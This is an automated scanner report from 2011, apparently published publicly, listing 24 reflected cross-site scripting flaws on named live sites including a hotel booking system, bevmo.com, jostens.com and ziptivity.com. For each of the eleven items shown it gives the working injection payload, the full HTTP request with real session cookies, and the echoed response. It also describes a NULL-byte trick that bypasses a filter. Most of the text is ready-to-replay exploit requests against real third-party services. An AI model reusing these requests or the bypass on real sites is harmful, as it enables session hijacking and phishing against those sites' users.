XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, 10282011-01

Report generated by XSS.CX at Fri Oct 28 15:05:17 CDT 2011.


Loading

1. Cross-site scripting (reflected)

1.1. https://booking.ihotelier.com/istay/istay.jsp [66d04%22%3balert(1)//0e2b4395118 parameter]

1.2. https://booking.ihotelier.com/istay/istay.jsp [Adults parameter]

1.3. https://booking.ihotelier.com/istay/istay.jsp [Children parameter]

1.4. https://booking.ihotelier.com/istay/istay.jsp [DateIn parameter]

1.5. https://booking.ihotelier.com/istay/istay.jsp [DateIn parameter]

1.6. https://booking.ihotelier.com/istay/istay.jsp [Length parameter]

1.7. https://booking.ihotelier.com/istay/istay.jsp [Rooms parameter]

1.8. https://booking.ihotelier.com/istay/istay.jsp [name of an arbitrarily supplied request parameter]

1.9. https://booking.ihotelier.com/istay/istay.jsp [name of an arbitrarily supplied request parameter]

1.10. https://booking.ihotelier.com/istay/istay.jsp [submit.x parameter]

1.11. https://booking.ihotelier.com/istay/istay.jsp [submit.y parameter]

1.12. https://booking.ihotelier.com/istay/istay.jsp [submit.y parameter]

1.13. http://www.bevmo.com/ [name of an arbitrarily supplied request parameter]

1.14. http://www.bevmo.com//Default.aspx [name of an arbitrarily supplied request parameter]

1.15. http://www.bevmo.com/ScriptResource.axd [d parameter]

1.16. http://www.bevmo.com/WebResource.axd [d parameter]

1.17. http://www.jostens.com/apps/shop/yrbk_flash.asp [desiredPackage parameter]

1.18. http://www.jostens.com/apps/shop/yrbk_flash.asp [desiredPackage parameter]

1.19. http://ziptivity.com/ [name of an arbitrarily supplied request parameter]

1.20. http://ziptivity.com/SearchPage.aspx [Distance parameter]

1.21. http://ziptivity.com/SearchPage.aspx [Zip parameter]

1.22. http://ziptivity.com/SearchPage.aspx [name of an arbitrarily supplied request parameter]

1.23. http://www.jostens.com/apps/shop/yrbk_catalog.asp [LeftNav cookie]

1.24. http://www.jostens.com/apps/shop/yrbk_catalog.asp [profileGuid cookie]



1. Cross-site scripting (reflected)
There are 24 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. https://booking.ihotelier.com/istay/istay.jsp [66d04%22%3balert(1)//0e2b4395118 parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://booking.ihotelier.com
Path:   /istay/istay.jsp

Issue detail

The value of the 66d04%22%3balert(1)//0e2b4395118 request parameter is copied into a JavaScript rest-of-line comment. The payload 65dc0%0aalert(1)//e5ca137a374 was submitted in the 66d04%22%3balert(1)//0e2b4395118 parameter. This input was echoed as 65dc0
alert(1)//e5ca137a374
in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /istay/istay.jsp?HotelID=13171&LanguageID=1&Rooms=1&DateIn=11%2F2%2F2011&Length=2&Adults=1&Children=0&submit.x=54&submit.y=8&66d04%22%3balert(1)//0e2b4395118=165dc0%0aalert(1)//e5ca137a374 HTTP/1.1
Host: booking.ihotelier.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: https://booking.ihotelier.com/istay/istay.jsp?HotelID=13171&LanguageID=1&Rooms=1&DateIn=11%2F2%2F2011&Length=2&Adults=1&Children=0&submit.x=54&submit.y=8&66d04%22%3balert(1)//0e2b4395118=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Chrome-13171=b92fde37-91ac-4001-a0e6-6a9f7298e762; JSESSIONID=33ED9B4F1F168F700648335690BB5AD3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902191818)/JBossWeb-2.0
P3P: CP='IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT'
Content-Type: text/html;charset=UTF-8
X-Cnection: close
Vary: Accept-Encoding
Content-Length: 7869
Date: Tue, 25 Oct 2011 02:08:06 GMT
Connection: keep-alive


<html>
   <head>
       
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
       <!-- Page served by webllm31 at Mon Oct 24 21:08:06 CDT 2011 -->
       <title>Inn at the Market</title>
...[SNIP]...
r reqParams = {
xfwdforchain: "50.23.123.106, 204.2.145.222",
requestParamsMap : "?DateIn=11/2/2011&Adults=1&LanguageID=1&HotelID=13171&66d04";alert(1)//0e2b4395118=165dc0
alert(1)//e5ca137a374
&submit.y=8&submit.x=54&Children=0&Rooms=1&Length=2&",
langID : "1",
portal : "",
sessionID : "b92fde37-91ac-4001-a0e6-6a9f7298e762"
};
...[SNIP]...

1.2. https://booking.ihotelier.com/istay/istay.jsp [Adults parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://booking.ihotelier.com
Path:   /istay/istay.jsp

Issue detail

The value of the Adults request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4b7fb"%3balert(1)//3db775249e2 was submitted in the Adults parameter. This input was echoed as 4b7fb";alert(1)//3db775249e2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /istay/istay.jsp?HotelID=13171&LanguageID=1&Rooms=1&DateIn=11%2F2%2F2011&Length=2&Adults=14b7fb"%3balert(1)//3db775249e2&Children=0&submit.x=54&submit.y=8 HTTP/1.1
Host: booking.ihotelier.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902191818)/JBossWeb-2.0
P3P: CP='IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT'
Content-Type: text/html;charset=UTF-8
X-Cnection: close
Vary: Accept-Encoding
Content-Length: 7839
Date: Tue, 25 Oct 2011 02:05:34 GMT
Connection: keep-alive


<html>
   <head>
       
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
       <!-- Page served by webllm32 at Mon Oct 24 21:05:34 CDT 2011 -->
       <title>Inn at the Market</title>
...[SNIP]...
pendChild(se);
           var reqParams = {
xfwdforchain: "50.23.123.106, 204.2.145.222",
requestParamsMap : "?HotelID=13171&submit.y=8&submit.x=54&DateIn=11/2/2011&Adults=14b7fb";alert(1)//3db775249e2&Children=0&LanguageID=1&Rooms=1&Length=2&",
langID : "1",
portal : "",
sessionID : "6c1b8dc7-db24-4b62-a842-eeda205ed971"
};
       </scrip
...[SNIP]...

1.3. https://booking.ihotelier.com/istay/istay.jsp [Children parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://booking.ihotelier.com
Path:   /istay/istay.jsp

Issue detail

The value of the Children request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7da63"%3balert(1)//322dc23182c was submitted in the Children parameter. This input was echoed as 7da63";alert(1)//322dc23182c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /istay/istay.jsp?HotelID=13171&LanguageID=1&Rooms=1&DateIn=11%2F2%2F2011&Length=2&Adults=1&Children=07da63"%3balert(1)//322dc23182c&submit.x=54&submit.y=8 HTTP/1.1
Host: booking.ihotelier.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902191818)/JBossWeb-2.0
P3P: CP='IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT'
Content-Type: text/html;charset=UTF-8
X-Cnection: close
Vary: Accept-Encoding
Content-Length: 7839
Date: Tue, 25 Oct 2011 02:05:37 GMT
Connection: keep-alive


<html>
   <head>
       
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
       <!-- Page served by webllm33 at Mon Oct 24 21:05:36 CDT 2011 -->
       <title>Inn at the Market</title>
...[SNIP]...
e);
           var reqParams = {
xfwdforchain: "50.23.123.106, 204.2.145.222",
requestParamsMap : "?HotelID=13171&submit.y=8&submit.x=54&DateIn=11/2/2011&Adults=1&Children=07da63";alert(1)//322dc23182c&LanguageID=1&Rooms=1&Length=2&",
langID : "1",
portal : "",
sessionID : "6c1b8dc7-db24-4b62-a842-eeda205ed971"
};
       </script>
...[SNIP]...

1.4. https://booking.ihotelier.com/istay/istay.jsp [DateIn parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://booking.ihotelier.com
Path:   /istay/istay.jsp

Issue detail

The value of the DateIn request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 154d8"%3b698281334b8 was submitted in the DateIn parameter. This input was echoed as 154d8";698281334b8 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /istay/istay.jsp?HotelID=13171&LanguageID=1&Rooms=1&DateIn=11%2F2%2F2011154d8"%3b698281334b8&Length=2&Adults=1&Children=0&submit.x=54&submit.y=8&66d04%22%3balert(1)//0e2b4395118=1 HTTP/1.1
Host: booking.ihotelier.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: https://booking.ihotelier.com/istay/istay.jsp?HotelID=13171&LanguageID=1&Rooms=1&DateIn=11%2F2%2F2011&Length=2&Adults=1&Children=0&submit.x=54&submit.y=8&66d04%22%3balert(1)//0e2b4395118=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Chrome-13171=b92fde37-91ac-4001-a0e6-6a9f7298e762; JSESSIONID=33ED9B4F1F168F700648335690BB5AD3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902191818)/JBossWeb-2.0
P3P: CP='IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT'
Content-Type: text/html;charset=UTF-8
X-Cnection: close
Vary: Accept-Encoding
Content-Length: 7860
Date: Tue, 25 Oct 2011 02:07:45 GMT
Connection: keep-alive


<html>
   <head>
       
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
       <!-- Page served by webllm34 at Mon Oct 24 21:07:45 CDT 2011 -->
       <title>Inn at the Market</title>
...[SNIP]...
           document.getElementsByTagName('head')[0].appendChild(se);
           var reqParams = {
xfwdforchain: "50.23.123.106, 204.2.145.222",
requestParamsMap : "?DateIn=11/2/2011154d8";698281334b8&Adults=1&LanguageID=1&HotelID=13171&66d04";alert(1)//0e2b4395118=1&submit.y=8&submit.x=54&Children=0&Rooms=1&Length=2&",
langID : "1",
portal : "",
s
...[SNIP]...

1.5. https://booking.ihotelier.com/istay/istay.jsp [DateIn parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://booking.ihotelier.com
Path:   /istay/istay.jsp

Issue detail

The value of the DateIn request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a3cc1"%3balert(1)//cf76ef69ba0 was submitted in the DateIn parameter. This input was echoed as a3cc1";alert(1)//cf76ef69ba0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /istay/istay.jsp?HotelID=13171&LanguageID=1&Rooms=1&DateIn=11%2F2%2F2011a3cc1"%3balert(1)//cf76ef69ba0&Length=2&Adults=1&Children=0&submit.x=54&submit.y=8 HTTP/1.1
Host: booking.ihotelier.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902191818)/JBossWeb-2.0
P3P: CP='IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT'
Content-Type: text/html;charset=UTF-8
X-Cnection: close
Vary: Accept-Encoding
Content-Length: 7839
Date: Tue, 25 Oct 2011 02:05:29 GMT
Connection: keep-alive


<html>
   <head>
       
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
       <!-- Page served by webllm31 at Mon Oct 24 21:05:28 CDT 2011 -->
       <title>Inn at the Market</title>
...[SNIP]...
           document.getElementsByTagName('head')[0].appendChild(se);
           var reqParams = {
xfwdforchain: "50.23.123.106, 204.2.145.222",
requestParamsMap : "?DateIn=11/2/2011a3cc1";alert(1)//cf76ef69ba0&Adults=1&LanguageID=1&HotelID=13171&submit.y=8&submit.x=54&Children=0&Rooms=1&Length=2&",
langID : "1",
portal : "",
sessionID : "6c1b8dc7-db24-4b62-
...[SNIP]...

1.6. https://booking.ihotelier.com/istay/istay.jsp [Length parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://booking.ihotelier.com
Path:   /istay/istay.jsp

Issue detail

The value of the Length request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1c4b3"%3balert(1)//3cc53739349 was submitted in the Length parameter. This input was echoed as 1c4b3";alert(1)//3cc53739349 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /istay/istay.jsp?HotelID=13171&LanguageID=1&Rooms=1&DateIn=11%2F2%2F2011&Length=21c4b3"%3balert(1)//3cc53739349&Adults=1&Children=0&submit.x=54&submit.y=8 HTTP/1.1
Host: booking.ihotelier.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902191818)/JBossWeb-2.0
P3P: CP='IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT'
Content-Type: text/html;charset=UTF-8
X-Cnection: close
Vary: Accept-Encoding
Content-Length: 7839
Date: Tue, 25 Oct 2011 02:05:31 GMT
Connection: keep-alive


<html>
   <head>
       
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
       <!-- Page served by webllm34 at Mon Oct 24 21:05:31 CDT 2011 -->
       <title>Inn at the Market</title>
...[SNIP]...
xfwdforchain: "50.23.123.106, 204.2.145.222",
requestParamsMap : "?DateIn=11/2/2011&Adults=1&LanguageID=1&HotelID=13171&submit.y=8&submit.x=54&Children=0&Rooms=1&Length=21c4b3";alert(1)//3cc53739349&",
langID : "1",
portal : "",
sessionID : "6c1b8dc7-db24-4b62-a842-eeda205ed971"
};
       </script>
...[SNIP]...

1.7. https://booking.ihotelier.com/istay/istay.jsp [Rooms parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://booking.ihotelier.com
Path:   /istay/istay.jsp

Issue detail

The value of the Rooms request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8c10f"%3balert(1)//d96274fc0b was submitted in the Rooms parameter. This input was echoed as 8c10f";alert(1)//d96274fc0b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /istay/istay.jsp?HotelID=13171&LanguageID=1&Rooms=18c10f"%3balert(1)//d96274fc0b&DateIn=11%2F2%2F2011&Length=2&Adults=1&Children=0&submit.x=54&submit.y=8 HTTP/1.1
Host: booking.ihotelier.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902191818)/JBossWeb-2.0
P3P: CP='IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT'
Content-Type: text/html;charset=UTF-8
X-Cnection: close
Vary: Accept-Encoding
Content-Length: 7838
Date: Tue, 25 Oct 2011 02:05:26 GMT
Connection: keep-alive


<html>
   <head>
       
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
       <!-- Page served by webllm34 at Mon Oct 24 21:05:26 CDT 2011 -->
       <title>Inn at the Market</title>
...[SNIP]...
= {
xfwdforchain: "50.23.123.106, 204.2.145.222",
requestParamsMap : "?DateIn=11/2/2011&Adults=1&LanguageID=1&HotelID=13171&submit.y=8&submit.x=54&Children=0&Rooms=18c10f";alert(1)//d96274fc0b&Length=2&",
langID : "1",
portal : "",
sessionID : "6c1b8dc7-db24-4b62-a842-eeda205ed971"
};
       </script>
...[SNIP]...

1.8. https://booking.ihotelier.com/istay/istay.jsp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://booking.ihotelier.com
Path:   /istay/istay.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 66d04"%3balert(1)//0e2b4395118 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 66d04";alert(1)//0e2b4395118 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /istay/istay.jsp?HotelID=13171&LanguageID=1&Rooms=1&DateIn=11%2F2%2F2011&Length=2&Adults=1&Children=0&submit.x=54&submit.y=8&66d04"%3balert(1)//0e2b4395118=1 HTTP/1.1
Host: booking.ihotelier.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902191818)/JBossWeb-2.0
P3P: CP='IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT'
Content-Type: text/html;charset=UTF-8
X-Cnection: close
Vary: Accept-Encoding
Content-Length: 7842
Date: Tue, 25 Oct 2011 02:05:45 GMT
Connection: keep-alive


<html>
   <head>
       
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
       <!-- Page served by webllm33 at Mon Oct 24 21:05:45 CDT 2011 -->
       <title>Inn at the Market</title>
...[SNIP]...
d')[0].appendChild(se);
           var reqParams = {
xfwdforchain: "50.23.123.106, 204.2.145.222",
requestParamsMap : "?DateIn=11/2/2011&Adults=1&LanguageID=1&HotelID=13171&66d04";alert(1)//0e2b4395118=1&submit.y=8&submit.x=54&Children=0&Rooms=1&Length=2&",
langID : "1",
portal : "",
sessionID : "6c1b8dc7-db24-4b62-a842-eeda205ed971"
};
...[SNIP]...

1.9. https://booking.ihotelier.com/istay/istay.jsp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://booking.ihotelier.com
Path:   /istay/istay.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript rest-of-line comment. The payload b8581%0aalert(1)//547cb97f009 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b8581
alert(1)//547cb97f009
in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /istay/istay.jsp?HotelID=13171&LanguageID=1&Rooms=1&DateIn=11%2F2%2F2011&Length=2&Adults=1&Children=0&submit.x=54&submit.y=8&66d04%22%3balert(1)//0e2b4395118=1&b8581%0aalert(1)//547cb97f009=1 HTTP/1.1
Host: booking.ihotelier.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: https://booking.ihotelier.com/istay/istay.jsp?HotelID=13171&LanguageID=1&Rooms=1&DateIn=11%2F2%2F2011&Length=2&Adults=1&Children=0&submit.x=54&submit.y=8&66d04%22%3balert(1)//0e2b4395118=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Chrome-13171=b92fde37-91ac-4001-a0e6-6a9f7298e762; JSESSIONID=33ED9B4F1F168F700648335690BB5AD3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902191818)/JBossWeb-2.0
P3P: CP='IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT'
Content-Type: text/html;charset=UTF-8
X-Cnection: close
Vary: Accept-Encoding
Content-Length: 7872
Date: Tue, 25 Oct 2011 02:08:29 GMT
Connection: keep-alive


<html>
   <head>
       
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
       <!-- Page served by webllm34 at Mon Oct 24 21:08:29 CDT 2011 -->
       <title>Inn at the Market</title>
...[SNIP]...
23.123.106, 204.2.145.222",
requestParamsMap : "?DateIn=11/2/2011&Adults=1&LanguageID=1&HotelID=13171&66d04";alert(1)//0e2b4395118=1&submit.y=8&submit.x=54&Children=0&Rooms=1&Length=2&b8581
alert(1)//547cb97f009
=1&",
langID : "1",
portal : "",
sessionID : "b92fde37-91ac-4001-a0e6-6a9f7298e762"
};
       </script>
...[SNIP]...

1.10. https://booking.ihotelier.com/istay/istay.jsp [submit.x parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://booking.ihotelier.com
Path:   /istay/istay.jsp

Issue detail

The value of the submit.x request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2ef70"%3balert(1)//26b53f8648b was submitted in the submit.x parameter. This input was echoed as 2ef70";alert(1)//26b53f8648b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /istay/istay.jsp?HotelID=13171&LanguageID=1&Rooms=1&DateIn=11%2F2%2F2011&Length=2&Adults=1&Children=0&submit.x=542ef70"%3balert(1)//26b53f8648b&submit.y=8 HTTP/1.1
Host: booking.ihotelier.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902191818)/JBossWeb-2.0
P3P: CP='IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT'
Content-Type: text/html;charset=UTF-8
X-Cnection: close
Vary: Accept-Encoding
Content-Length: 7839
Date: Tue, 25 Oct 2011 02:05:39 GMT
Connection: keep-alive


<html>
   <head>
       
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
       <!-- Page served by webllm34 at Mon Oct 24 21:05:39 CDT 2011 -->
       <title>Inn at the Market</title>
...[SNIP]...
;
           var reqParams = {
xfwdforchain: "50.23.123.106, 204.2.145.222",
requestParamsMap : "?DateIn=11/2/2011&Adults=1&LanguageID=1&HotelID=13171&submit.y=8&submit.x=542ef70";alert(1)//26b53f8648b&Children=0&Rooms=1&Length=2&",
langID : "1",
portal : "",
sessionID : "6c1b8dc7-db24-4b62-a842-eeda205ed971"
};
       </script>
...[SNIP]...

1.11. https://booking.ihotelier.com/istay/istay.jsp [submit.y parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://booking.ihotelier.com
Path:   /istay/istay.jsp

Issue detail

The value of the submit.y request parameter is copied into a JavaScript rest-of-line comment. The payload 57259%0aalert(1)//e3871f293d was submitted in the submit.y parameter. This input was echoed as 57259
alert(1)//e3871f293d
in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

